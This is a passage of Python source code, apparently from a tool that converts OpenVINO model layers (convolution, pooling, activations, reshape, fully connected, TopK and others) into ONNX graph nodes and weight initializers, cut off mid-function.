bias_outputs = io(bias_vinode)\n node_id = bias_vinode.id\n\n buf = outputs[0]\n node_outputs = outputs\n if bias_vinode:\n buf = bias_outputs[0]\n node_outputs = bias_outputs\n\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1] + ['W{}'.format(node_id)]\n if bias_vinode:\n biases = vinodes[int(bias_inputs[1])]\n inputs += ['b{}'.format(node_id)]\n \n if 'auto_pad' in vinode.data:\n auto_pad = vinode.data['auto_pad'].upper()\n pads = auto_pad_calc(auto_pad,\n vinode.input[0],\n as_int(weights.data['shape'])[-2:],\n as_int(vinode.data['strides']),\n as_int(vinode.data['dilations']))\n else:\n auto_pad = None\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n node = onnx.helper.make_node(\n 'Conv',\n inputs = inputs,\n outputs = node_outputs,\n strides = as_int(vinode.data['strides']),\n dilations = as_int(vinode.data['dilations']),\n kernel_shape = as_int(weights.data['shape'])[-2:],\n pads = pads,\n name = str(node_id),\n )\n nodes.append(node)\n\n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n as_int(weights.data['shape']),\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n if bias_vinode and biases:\n tensor = onnx.helper.make_tensor('b{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:2],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n\n return nodes, inits\n\n\ndef gen_group_conv_10(vinode, bias_vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n node_id = vinode.id\n if bias_vinode:\n bias_inputs, bias_outputs = io(bias_vinode)\n node_id = bias_vinode.id\n\n buf = outputs[0]\n node_outputs = outputs\n if bias_vinode:\n buf = bias_outputs[0]\n node_outputs = bias_outputs\n\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1] + ['W{}'.format(node_id)]\n if bias_vinode:\n biases = vinodes[int(bias_inputs[1])]\n inputs += ['b{}'.format(node_id)]\n\n if 'auto_pad' in vinode.data:\n auto_pad = vinode.data['auto_pad'].upper()\n pads = auto_pad_calc(auto_pad,\n vinode.input[0],\n as_int(weights.data['shape'])[-2:],\n as_int(vinode.data['strides']),\n as_int(vinode.data['dilations']))\n else:\n auto_pad = None\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n kernel_shape = as_int(weights.data['shape'])\n kernel_shape = [kernel_shape[0] * kernel_shape[1]] + kernel_shape[2:3] + kernel_shape[-2:]\n node = onnx.helper.make_node(\n 'Conv',\n inputs = inputs,\n outputs = node_outputs,\n group = as_int(weights.data['shape'])[0],\n strides = as_int(vinode.data['strides']),\n dilations = as_int(vinode.data['dilations']),\n kernel_shape = as_int(weights.data['shape'])[-2:],\n pads = pads,\n name = str(node_id),\n )\n nodes.append(node)\n\n\n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n kernel_shape,\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n if bias_vinode and biases:\n tensor = onnx.helper.make_tensor('b{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:2],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_maxpool_10(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n ceil_mode = 0\n if 'rounding_type' in vinode.data and vinode.data['rounding_type'] == 'ceil':\n ceil_mode = 1\n\n node = onnx.helper.make_node(\n 'MaxPool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n # auto_pad = \"SAME_UPPER\",\n pads = pads,\n ceil_mode = ceil_mode,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_avgpool_10(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n ceil_mode = 0\n if 'rounding_type' in vinode.data and vinode.data['rounding_type'] == 'ceil':\n ceil_mode = 1\n\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n # auto_pad = \"SAME_UPPER\",\n pads = pads,\n ceil_mode = ceil_mode,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_reduce_10(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n idims = vinode.input[0]\n odims = vinode.output[0]\n keep_dims = True\n if 'keep_dims' in vinode.data and vinode.data['keep_dims'] == 'False':\n keep_dims = False\n assert(not keep_dims or odims[-2:] == (1, 1))\n\n if keep_dims:\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs[:1],\n outputs=outputs,\n kernel_shape = list(idims[-2:]),\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n flatten_output = '{}_flat'.format(vinode.id)\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs[:1],\n outputs=[_buf],\n kernel_shape = list(idims[-2:]),\n name = _buf,\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=[_buf],\n outputs=outputs,\n name = buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_multiply_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n assert(len(inputs) == 2)\n constant_input = [is_constant(vinodes[int(i)], vinodes) for i in inputs]\n if constant_input[0]:\n weights = vinodes[int(inputs[0])]\n inputs = inputs[1:]\n elif constant_input[1]:\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1]\n else:\n print('error, non-const multiply not implemented')\n\n inputs = inputs + ['W{}'.format(vinode.id)]\n\n node = onnx.helper.make_node(\n 'Mul',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(weights.data['shape'])[1:],\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_add_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n is_const = False\n for input in inputs:\n input_vinode = [_ for _ in vinodes if str(_.id) == input][0]\n if input_vinode.type == 'Const':\n is_const = True\n\n if not is_const:\n node = onnx.helper.make_node(\n 'Sum',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n biases = vinodes[int(inputs[1])]\n if biases:\n inputs = inputs[:-1] + ['b{}'.format(vinode.id)]\n\n node = onnx.helper.make_node(\n 'Add',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n if biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_relu(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n if vinode.data and 'negative_slope' in vinode.data:\n slope = float(vinode.data['negative_slope'])\n node = onnx.helper.make_node(\n 'LeakyRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n alpha=slope,\n )\n\n else:\n node = onnx.helper.make_node(\n 'Relu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_prelu(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n inputs = inputs[:1]\n\n assert(int(vinode.data['channel_shared']) == 0)\n slope = onnx.helper.make_tensor('slope_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (vinode.weights['arr'].shape[0], 1, 1),\n vinode.weights['arr'].tolist())\n inits.append(slope)\n inputs.append('slope_{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'PRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\ndef gen_prelu_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n data_node = vinodes[int(inputs[1])]\n if data_node.type != 'Const':\n sys.stderr.write(\"ERROR:Non-constant weights in Prelu node {} not supported\\n\".format(vinode.name))\n sys.exit(1)\n\n inputs = inputs[0:1]\n\n if data_node.data['shape'] == '1':\n slope = float(data_node.data['arr'][0])\n node = onnx.helper.make_node(\n 'LeakyRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n alpha=slope,\n )\n nodes.append(node)\n else:\n\n slope = onnx.helper.make_tensor('slope_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (data_node.data['arr'].shape[0], 1, 1),\n data_node.data['arr'].tolist())\n inits.append(slope)\n\n inputs.append('slope_{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'PRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_elu(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n alpha = float(vinode.data['alpha'])\n node = onnx.helper.make_node(\n 'Elu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n alpha=alpha,\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_const(vinode):\n nodes, inits = [], []\n\n tensor = onnx.helper.make_tensor('{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n vinode.custom['arr'].shape,\n vinode.custom['arr'].tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\n# this function is no longer used with the darknet_to_onnx tool\ndef gen_extract(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n stride, stride = as_int(vinode.data['strides'])\n assert(stride == 2)\n dims = vinode.input[0]\n dims = tuple([-1] + list(dims)[1:])\n\n reshape_1 = np.array([dims[0], dims[1], dims[2]//stride, stride, dims[3]//stride, stride], dtype=np.int64)\n transpose_1 = [0,1,2,4,3,5]\n tensor = onnx.helper.make_tensor('shape_1_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_1.shape,\n reshape_1.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=[inputs[0], 'shape_1_{}'.format(vinode.id)],\n outputs=['reshape_1_{}'.format(vinode.id)],\n name = str('reshape_1_{}'.format(vinode.id))\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Transpose',\n inputs=['reshape_1_{}'.format(vinode.id)],\n outputs=['transpose_1_{}'.format(vinode.id)],\n perm = transpose_1,\n name = str('transpose_1_{}'.format(vinode.id))\n )\n nodes.append(node)\n\n reshape_2 = np.array([dims[0], dims[1], dims[2]//stride*dims[2]//stride, stride*stride], dtype=np.int64)\n transpose_2 = [0,1,3,2]\n tensor = onnx.helper.make_tensor('shape_2_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_2.shape,\n reshape_2.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=['transpose_1_{}'.format(vinode.id), 'shape_2_{}'.format(vinode.id)],\n outputs=['reshape_2_{}'.format(vinode.id)],\n name = str('reshape_2_{}'.format(vinode.id))\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Transpose',\n inputs=['reshape_2_{}'.format(vinode.id)],\n outputs=['transpose_2_{}'.format(vinode.id)],\n perm = transpose_2,\n name = str('transpose_2_{}'.format(vinode.id))\n )\n nodes.append(node)\n\n reshape_3 = np.array([dims[0], dims[1], stride*stride, dims[2]//stride, dims[2]//stride], dtype=np.int64)\n transpose_3 = [0,2,1,3,4]\n tensor = onnx.helper.make_tensor('shape_3_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_3.shape,\n reshape_3.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=['transpose_2_{}'.format(vinode.id), 'shape_3_{}'.format(vinode.id)],\n outputs=['reshape_3_{}'.format(vinode.id)],\n name = str('reshape_3_{}'.format(vinode.id))\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Transpose',\n inputs=['reshape_3_{}'.format(vinode.id)],\n outputs=['transpose_3_{}'.format(vinode.id)],\n perm = transpose_3,\n name = str('transpose_3_{}'.format(vinode.id))\n )\n nodes.append(node)\n\n reshape_4 = np.array([dims[0], dims[1]*stride*stride, dims[2]//stride, dims[2]//stride], dtype=np.int64)\n tensor = onnx.helper.make_tensor('shape_4_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_4.shape,\n reshape_4.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=['transpose_3_{}'.format(vinode.id), 'shape_4_{}'.format(vinode.id)],\n outputs=outputs,\n name = str(vinode.id)\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_flatten(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=inputs[:1], # TODO\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_clamp(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n\n min_clip = onnx.helper.make_tensor('min_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (),\n vals=np.float32(vinode.data['min']).tobytes(),\n raw=True,\n )\n inits.append(min_clip)\n inputs.append('min_{}'.format(vinode.id))\n\n max_clip = onnx.helper.make_tensor('max_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (),\n vals=np.float32(vinode.data['max']).tobytes(),\n raw=True,\n )\n inits.append(max_clip)\n inputs.append('max_{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'Clip',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_interp(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n factor = float(vinode.data['factor'])\n if factor == 1.0:\n #for some reason this node was inserted in deeplabv3,\n #exchange it for identity\n return gen_identity(vinode)\n if not vinode.data['align_corners']:\n sys.stderr.write('WARNING: Node{}: align_corners not set in openvino interp node. Forcing to be align corners')\n mode = 'linear'\n roi = onnx.helper.make_tensor('roi{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (0,), [])\n\n\n inits.append(roi)\n inputs.append('roi{}'.format(vinode.id))\n scales = np.array([1.0, 1.0, factor, factor], dtype=np.float32)\n tensor = onnx.helper.make_tensor('s{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n scales.shape,\n scales.tolist(),\n )\n inits.append(tensor)\n inputs.append('s{}'.format(vinode.id))\n\n node = onnx.helper.make_node('Resize',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n mode = mode,\n coordinate_transformation_mode=\"align_corners\")\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_interpolate(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n inputs = inputs[:1]\n idims = vinode.input[0]\n odims = vinode.output[0]\n factor0 = float(odims[-2]) / float(idims[-2])\n factor1 = float(odims[-1]) / float(idims[-1])\n assert(factor0 == factor1)\n factor = factor0\n\n if factor == 1.0:\n return gen_identity(vinode)\n mode = vinode.data['mode']\n assert(mode in ['linear', 'nearest'])\n\n if not vinode.data['align_corners']:\n sys.stderr.write('WARNING: Node{}: align_corners not set in openvino interp node. Forcing to be align corners')\n roi = onnx.helper.make_tensor('roi{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (0,), [])\n\n inits.append(roi)\n inputs.append('roi{}'.format(vinode.id))\n scales = np.array([1.0, 1.0, factor, factor], dtype=np.float32)\n tensor = onnx.helper.make_tensor('s{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n scales.shape,\n scales.tolist(),\n )\n inits.append(tensor)\n inputs.append('s{}'.format(vinode.id))\n\n node = onnx.helper.make_node('Resize',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n mode = mode,\n coordinate_transformation_mode=\"align_corners\")\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_resample(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n assert(vinode.data['type'] == 'caffe.ResampleParameter.NEAREST')\n assert(vinode.data['height'] == '0')\n assert(vinode.data['width'] == '0')\n assert(vinode.data['antialias'] == '0')\n\n factor = vinode.data['factor']\n mode = 'nearest'\n roi = onnx.helper.make_tensor('roi{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (0,), [])\n\n\n inits.append(roi)\n inputs.append('roi{}'.format(vinode.id))\n\n scales = np.array([1.0, 1.0, factor, factor], dtype=np.float32)\n\n tensor = onnx.helper.make_tensor('s{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n scales.shape,\n scales.tolist(),\n )\n inits.append(tensor)\n inputs.append('s{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'Resize',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n mode = mode,\n )\n nodes.append(node)\n\n\n return nodes, inits\n\n\ndef gen_pooling(vinode):\n # TODO confirm padding\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n ceil_mode = 0\n if 'rounding_type' in vinode.data and vinode.data['rounding_type'] == 'ceil':\n ceil_mode = 1\n\n if vinode.data['pool-method'] == 'max':\n node = onnx.helper.make_node(\n 'MaxPool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n # auto_pad = \"SAME_UPPER\",\n pads = pads,\n ceil_mode = ceil_mode,\n name = str(vinode.id),\n )\n nodes.append(node)\n elif vinode.data['pool-method'] == 'avg':\n count_include_pad = 0\n if 'exclude-pad' in vinode.data and vinode.data['exclude-pad'] == 'false':\n count_include_pad = 1\n\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n pads = pads,\n ceil_mode = ceil_mode,\n count_include_pad = count_include_pad,\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n print('WARNING', vinode.data['pool-method'])\n\n return nodes, inits\n\n\ndef gen_eltwise(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n\n\n if vinode.data['operation'] == 'sum':\n node = onnx.helper.make_node(\n 'Sum',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n raise RuntimeError('Node {} Error: Unsupported eltwise operation'.format(vinode.id))\n\n return nodes, inits\n\n\ndef gen_concat(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n axis = int(vinode.data['axis'])\n\n if axis != 1:\n errmsg=\"ERROR: Node {}: Concatenating on axis {}. Concat nodes only suppported with axis == 1\\n\"\n sys.stderr.write(errmsg.format(vinode.name,axis))\n sys.exit(1)\n\n node = onnx.helper.make_node(\n 'Concat',\n inputs=inputs,\n outputs=outputs,\n axis=axis,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_norm(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n inputs = inputs[:1]\n\n alpha = float(vinode.data['alpha'])\n beta = float(vinode.data['beta'])\n nsize = int(vinode.data['size'])\n\n node = onnx.helper.make_node(\n 'LRN',\n inputs=inputs,\n outputs=outputs,\n alpha=alpha,\n beta=beta,\n size=nsize,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_scaleshift(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n _buf = outputs[0] + '_ss'\n\n if vinode.weights and vinode.biases:\n mul_inputs = [inputs[0], inputs[1]]\n mul_outputs = [_buf]\n add_inputs = [_buf, inputs[2]]\n\n node = onnx.helper.make_node(\n 'Mul',\n inputs=mul_inputs,\n outputs=mul_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Add',\n inputs=add_inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n elif vinode.weights:\n node = onnx.helper.make_node(\n 'Mul',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n elif vinode.biases:\n node = onnx.helper.make_node(\n 'Add',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n assert(vinode.weights['arr'].shape == vinode.biases['arr'].shape)\n assert(vinode.weights['arr'].ndim == 1)\n shape = (vinode.weights['arr'].shape[0], 1, 1)\n\n if vinode.weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n shape,\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n shape,\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_reshape(vinode):\n nodes, inits = [], []\n\n if len(one_elem(vinode.output)):\n\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n inputs = inputs[:1]\n inputs.append('reshape_{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n\n val = list(one_elem(vinode.output))\n val = [-1] + val[1:]\n tensor = onnx.helper.make_tensor('reshape_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n np.asarray(vinode.output[0]).shape,\n val,\n )\n inits.append(tensor)\n\n return nodes, inits\n\ndef gen_mul1(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n mul_buf = 'W{}'.format(vinode.id)\n mul_inputs = [inputs[0], mul_buf]\n\n tensor = onnx.helper.make_tensor(mul_buf,\n onnx.TensorProto.FLOAT,\n (1,),\n [1.],\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Mul',\n inputs=mul_inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\ndef gen_power(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n assert(float(vinode.data['power']) == 1.0)\n shift = float(vinode.data['shift'])\n scale = float(vinode.data['scale'])\n\n mul_buf = 'W{}'.format(vinode.id)\n tensor = onnx.helper.make_tensor(mul_buf,\n onnx.TensorProto.FLOAT,\n (1,),\n [scale],\n )\n inits.append(tensor)\n\n bias_buf = 'b{}'.format(vinode.id)\n tensor = onnx.helper.make_tensor(bias_buf,\n onnx.TensorProto.FLOAT,\n (1,),\n [shift],\n )\n inits.append(tensor)\n\n _buf = outputs[0] + '_ss'\n mul_inputs = [inputs[0], mul_buf]\n mul_outputs = [_buf]\n add_inputs = [_buf, bias_buf]\n\n node = onnx.helper.make_node(\n 'Mul',\n inputs=mul_inputs,\n outputs=mul_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Add',\n inputs=add_inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\ndef gen_fullyconnected(vinode, prev_vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n\n dims = vinode.output[0]\n prev_dims = prev_vinode.output[0]\n if len(dims) != len(prev_dims):\n flatten_inputs = [inputs[0]]\n flatten_outputs = [_buf]\n gemm_inputs = [_buf] + inputs[1:]\n\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=flatten_inputs,\n outputs=flatten_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=gemm_inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n else:\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n\n length = vinode.weights['arr'].shape[0]\n output_size = as_int(vinode.data['out-size'])\n input_size = int(length / output_size)\n\n if vinode.weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size, input_size),\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size,),\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\ndef gen_matmul(vinode, prev_vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n\n dims = vinode.output[0]\n prev_dims = prev_vinode.output[0]\n\n if len(dims) != len(prev_dims):\n flatten_inputs = [inputs[0]]\n flatten_outputs = [_buf]\n gemm_inputs = [_buf] + inputs[1:]\n\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=flatten_inputs,\n outputs=flatten_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=gemm_inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n else:\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n\n length = vinode.weights['arr'].shape[0]\n output_size = as_int(vinode.data['out-size'])\n input_size = int(length / output_size)\n\n if vinode.weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size, input_size),\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size,),\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_matmul_10(vinode, bias_vinode, prev_vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n dims = vinode.output[0]\n prev_dims = prev_vinode.output[0]\n\n inputs[0] = str(prev_vinode.id)\n if bias_vinode:\n bias_inputs, bias_outputs = io(bias_vinode)\n outputs = bias_outputs\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1] + ['W{}'.format(vinode.id)]\n if bias_vinode:\n biases = vinodes[int(bias_inputs[1])]\n inputs += ['b{}'.format(vinode.id)]\n\n if len(dims) != len(prev_dims):\n flatten_inputs = [inputs[0]]\n flatten_outputs = [_buf]\n gemm_inputs = [_buf] + inputs[1:]\n\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=flatten_inputs,\n outputs=flatten_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=gemm_inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n else:\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n\n \n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(weights.data['shape']),\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n if bias_vinode and biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:2],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_identity(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n node = onnx.helper.make_node('Identity', inputs[:1], outputs, name = str(vinode.id))\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_topk(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n axis = int(vinode.data['axis'])\n mode = vinode.data['mode']\n\n idim = vinode.input[0]\n if axis!= 1:\n errmsg=\"ERROR: Node {}: TopK is only supported on axis 1\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n maps = idim[axis]\n if maps > 256:\n errmsg=\"ERROR: Node {}: TopK is only supported on less than 256 maps\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n\n if mode != 'max':\n errmsg=\"ERROR: Node {}: TopK is only supported with mode == max\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n\n buf = outputs[0]\n _buf = outputs[0] + '_ss'\n argmax_inputs = [inputs[0]]\n cast_inputs = [_buf]\n\n node = onnx.helper.make_node('ArgMax', argmax_inputs, [_buf], name = _buf, axis=axis)\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Cast',\n inputs=cast_inputs,\n outputs=outputs,\n name=buf,\n 